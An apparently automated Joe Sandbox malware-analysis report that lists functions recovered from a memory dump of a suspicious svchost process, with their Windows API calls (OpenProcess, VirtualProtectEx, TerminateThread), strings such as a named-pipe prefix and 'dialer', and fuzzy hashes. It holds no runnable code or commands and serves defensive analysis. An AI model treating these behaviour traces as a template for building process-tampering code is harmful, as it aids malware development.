Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 605ae0c5fc4444a5e44f86b30e1be22f4d8fd3f1459b7e039f4c2af0defd8569
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: B3D17C7A249F48D5DA70DB1AE89439A77A0F3CCB85F240116EA8D5BBA5DF38C552CF00

Function 00000158709D30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000158709D30D7
HeapAlloc.KERNEL32 ref: 00000158709D30EA
StrCmpNIW.SHLWAPI ref: 00000158709D316B
GetProcessHeap.KERNEL32 ref: 00000158709D31D1
HeapFree.KERNEL32 ref: 00000158709D31DF

Strings

dialer, xrefs: 00000158709D3164

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: fe0cafdca754bb0dce62d5bafccfd1fbdf8df8d32b801cc7944905e26050c8b7
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 3F31863A749F5AD2E7159F56DC443A97390FB88B86F14C1249E482B755EF34C8638B00

Function 00000158709D1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000158709D1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000158709D1A58
PathFindFileNameW.SHLWAPI ref: 00000158709D1A67
lstrlenW.KERNEL32 ref: 00000158709D1A73
StrCpyW.SHLWAPI ref: 00000158709D1A86
CloseHandle.KERNEL32 ref: 00000158709D1A94

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: d6a487be8c80e4d218c9a83fb651c88bcf090149f0ce6339f20e5a6fd2dd3b5d
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 89015E36304E41D6EA10DB12E8587A973A1F78CFC2F988035CE8957764DE38C9968B00

Function 00000158709D37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000158709D37C8
GetCurrentProcess.KERNEL32 ref: 00000158709D37D6
VirtualProtectEx.KERNEL32 ref: 00000158709D37F8
GetCurrentProcess.KERNEL32 ref: 00000158709D3819
VirtualProtectEx.KERNEL32 ref: 00000158709D383A
TerminateThread.KERNEL32 ref: 00000158709D3849

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: bf15e704f6403858d8d42cfcd6eb2d4770613fe67df2030ee4d80af52552d780
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: B1111E7A615F44C2EB249B21EC0979A77A1BB9CF47F244428D9492B765EF3DC81ACF00

Function 00000158709D90F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000158709D9103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000158709D9198
RtlUnwindEx.NTDLL ref: 00000158709D91E7

Strings

csm, xrefs: 00000158709D917E
f, xrefs: 00000158709D9116

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 383ff32e568238b837e88c5d96d4421159f0f833f1cf646560342c8af26a8bdc
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 7951D63A359A09D6EB14EF15E844B983395F3C8B89F608120DE266B74ADF35DC42CF00

Function 00000158709D90D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000158709D9103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000158709D9198
RtlUnwindEx.NTDLL ref: 00000158709D91E7

Strings

csm, xrefs: 00000158709D917E
f, xrefs: 00000158709D9116

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: c79aa341e3225fb65009963fa503658fafe76f4003d0aeb7e83d5f305c969f9b
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 3931E23A208B45D6E710EF11EC4879937A5F388BCAF248114AE5A2B756CF38C942CB04

Function 00000158709D1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000158709D1AD8
StrCmpNIW.SHLWAPI ref: 00000158709D1AF2
lstrlenW.KERNEL32 ref: 00000158709D1B01
StrCpyW.SHLWAPI ref: 00000158709D1B16

Strings

\\?\, xrefs: 00000158709D1AE6

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 9cd51c56bf66afd3f697c63216cecde92d8a3b691b99c039d21d90fcbab0d531
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 48F04977304A45E1E7208B21FC943997760F7C8B85F949025CA495EA69DE6CCA5ACF00

Function 00000158709D3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000158709D3222
StrCpyW.SHLWAPI ref: 00000158709D3232
StrCatW.SHLWAPI ref: 00000158709D323E
PathCombineW.SHLWAPI ref: 00000158709D324C

Strings

\\.\pipe\, xrefs: 00000158709D3218

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: faad9be2767793de60da5213e16db54363fb9eba61d5be2a7d00a72c81c1f998
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 2DF05439604F40D1EA004B13FD082A97221A7CCFD2F14D1319EA62BB39CE28C8528B00

Function 00000158709DA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000158709DA154
GetProcAddress.KERNEL32 ref: 00000158709DA16A
FreeLibrary.KERNEL32 ref: 00000158709DA187

Strings

CorExitProcess, xrefs: 00000158709DA163
mscoree.dll, xrefs: 00000158709DA14B

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: acf1baf613080be46060738bdfe23f8d14c5bc3207b68563561bf008e0f48cdb
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 19F05E7A325E44E2EF548B60EC883A43360ABCCB92F646019951B5D671CE28C8AACF00

Function 00000158709D51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000158709D5236

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 3584f88d8aa85d1c53dc84a72d8b83e83d68c137e618b8d1b87bcfe58d9cde4d
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 7F02C83625DB84C6E760CB55E89039AB7A0F3C8795F200115EA8E9BBA9DF7CC495CF00

Function 00000158709E0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000158709E08A2
GetConsoleMode.KERNEL32 ref: 00000158709E0960
GetLastError.KERNEL32 ref: 00000158709E09EA

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: bd2f0b25102ebdb2c9f9cbea5ed8d76dbe5800a441c613ef0b6a34a9b80f5020
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: B381C23B610E44D9FB909B619C443ED36A1F7CCB86F644115DA0ABB7A6DE348CA3CB10

Function 00000158709D57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000158709D5806

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: b1c30dd4f9db59132618a29f70b08293222acfcfbe393f64703705fb9c5697ee
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: C161D73A55DA44C6E7608B55E85035AB7A0F3C8746F600226EA8D5BBA9DF7CC952CF00

Function 00000158709E1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000158709E1EE0
_set_statfp.LIBCMT ref: 00000158709E1EFB
_set_statfp.LIBCMT ref: 00000158709E1F17
_set_statfp.LIBCMT ref: 00000158709E1F53

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: d541997ebc00b2a5cceab2fa8774ec3b9982276d4687afb42848031f678c4168
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 0E11913BA54E00C1F6981165EC563E53040EBEC376F740AA9BA763E3F68F148C634944

Function 00000158709B12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000158709B12E0
_set_statfp.LIBCMT ref: 00000158709B12FB
_set_statfp.LIBCMT ref: 00000158709B1317
_set_statfp.LIBCMT ref: 00000158709B1353

Memory Dump Source

Source File: 00000017.00000002.2690081130.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709a0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 5307f03f800e756aa5a3f3b814202ce4077b08ad189adc188728c76bbf75e883
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 3511A33AA54E01C1F6641165FC563E930C36BDD37EFF80624AA76FEBD6AE188C434904

Function 00000158709D3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000158709D3886
GetCurrentProcess.KERNEL32 ref: 00000158709D38B4
VirtualProtectEx.KERNEL32 ref: 00000158709D38D6
GetCurrentProcess.KERNEL32 ref: 00000158709D38F4
VirtualProtectEx.KERNEL32 ref: 00000158709D3915

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 0463c626952a5afa813e324d381295324227a4e08269efaa1482c53d52e0f2cf
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 28112A3E708F44C2EB149B11F8183A976A1F788B86F548029DE891B7A5EE3DC916CB00

Function 00000158709A84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000158709A8503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000158709A8598

Strings

f, xrefs: 00000158709A8516
csm, xrefs: 00000158709A857E

Memory Dump Source

Source File: 00000017.00000002.2690081130.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709a0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 6d85c8afa4a9c86aa0a373ec3f14b916e9f711b5b4402a039322b6514f2db16d
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: B651B3BA71AA00CAEB14CF15DC44B9AB3A5F3C8B99F658124DE066B748DF34D842DB04

Function 00000158709A84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000158709A8503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000158709A8598

Strings

f, xrefs: 00000158709A8516
csm, xrefs: 00000158709A857E

Memory Dump Source

Source File: 00000017.00000002.2690081130.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709a0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: b3f0edccf99905f382a7346637925336b1100363b4094cf102ded9bfb40b3313
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 2031E2B9615B40D6E710DF11EC447AAB7A4F3C8BDAF258014AE4B6B744CF38C942DB04

Function 00000158709D14B4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000158709D14D5
HeapFree.KERNEL32 ref: 00000158709D14E4
GetProcessHeap.KERNEL32 ref: 00000158709D14F0
HeapFree.KERNEL32 ref: 00000158709D14FF
GetProcessHeap.KERNEL32 ref: 00000158709D152A

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction ID: 23d0eaace0ac68930566f5e0a1521823ac540ad42edf416a2ae561af69bd9217
Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction Fuzzy Hash: FF111C3A518F88D2E7549F66E84425A7360F7CDF85F148129EB8A17725DF38C4528B40

Function 00000158709D26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000158709D27D4
StrCpyW.SHLWAPI ref: 00000158709D27ED

Strings

\\.\pipe\, xrefs: 00000158709D27DF

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 64904f6f34f6a3ab1502068cd7f5f3d2df93d8577a900f431e13ba3132b13b92
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 9171E73A248F89C5E7249F25DD543EAB390F7DCB86F644016DE496BB9ADE34C9068F00

Function 00000158709D24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000158709D25C3
StrCpyW.SHLWAPI ref: 00000158709D25DA

Strings

\\.\pipe\, xrefs: 00000158709D25CE

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 079086d1646fb036f3f4b3483ba4c92b44b37e4bbaba34a90f94b8ec2cd7063b
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 5F51C73A24CF85C1E6259E25E9543EE7751F3D9781FA14026DD892BB9BCE35C8038F40

Function 00000158709E0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000158709E071B
GetLastError.KERNEL32 ref: 00000158709E073D

Strings

U, xrefs: 00000158709E06C7

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: f0c433f3343e4af7e0caadf0e79506d533a505cf38706b0738dc18345a1afc4d
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 7B418077215A40C2EB609F25E8443EAB7A0F7CCB85F544125EA8D9B7A8DF38C952CB40

Function 00000158709DD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000158709DD6F9
LCMapStringW.KERNEL32 ref: 00000158709DD781

Strings

LCMapStringEx, xrefs: 00000158709DD6DC, 00000158709DD6ED

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: aa35f81f19f9c3d912f4463f41fcb8b318c76f2755ccf529b36f8a280980f6b4
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 8C11083A608B84C6D760CB16F88079AB7A4F7CDB90F644126EE8D97B69DF38C5518B00

Function 00000158709D94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000158709D94E8
RaiseException.KERNEL32 ref: 00000158709D952E

Strings

csm, xrefs: 00000158709D951B

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: da811fd2e96297730f88a3f3636776792f3bb495db94cf25facd77d8cbf65429
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: FB113036208B84C2EB618B15F94039977A0F788B95F684220EF8D1BB65DF38C952CB00

Function 00000158709DD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000158709DD68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000158709DD6A7

Strings

InitializeCriticalSectionEx, xrefs: 00000158709DD681

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 1527ba6ea90d43fa9bd87db690250a9e812e030b6af49a45b9236171b8b9a2e6
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 88F0BE3A714F84D1EB049B51FC007D43220ABCCB82FA89121AA592BB65CE78C8A6CF40

Function 00000158709DD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000158709DD631
TlsSetValue.KERNEL32 ref: 00000158709DD648

Strings

FlsSetValue, xrefs: 00000158709DD61E

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 48d736319ca0e22af96894bd074dbc127beba1d3cfdca6214cc1789fa3050852
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: A3E0657A205E44D1EA054B64FC047D43221ABCCB82FA89121D5191E7A5CE38CCA7CF00

Function 00000158709ACB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000158709ACBC5

Strings

November, xrefs: 00000158709ACBA8, 00000158709ACBB2
October, xrefs: 00000158709ACBBE

Memory Dump Source

Source File: 00000017.00000002.2690081130.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709a0000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 0393590c33e19164a8c07664aed2b4602683238996804b9f85fec93e4178c60c
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: F7E06DB9608D41D2EA059B55EC413E43261DBDC75AF795021D5192E352CE38C887EA00

Function 00000158709D1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000158709D1D9B
HeapAlloc.KERNEL32 ref: 00000158709D1DAA
GetProcessHeap.KERNEL32 ref: 00000158709D1E1E
HeapFree.KERNEL32 ref: 00000158709D1E2C

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: f6d149c8d84ff1c0aabae68c35d5f754b94e87aa1729b5fc27a634e008e7874e
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: E621713B648F84D1EB118F69E80439AB3A0FBC8B95F254114DE8C5BB65EF78C5538B00

Function 00000158709D1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000158709D127A
HeapAlloc.KERNEL32 ref: 00000158709D1289
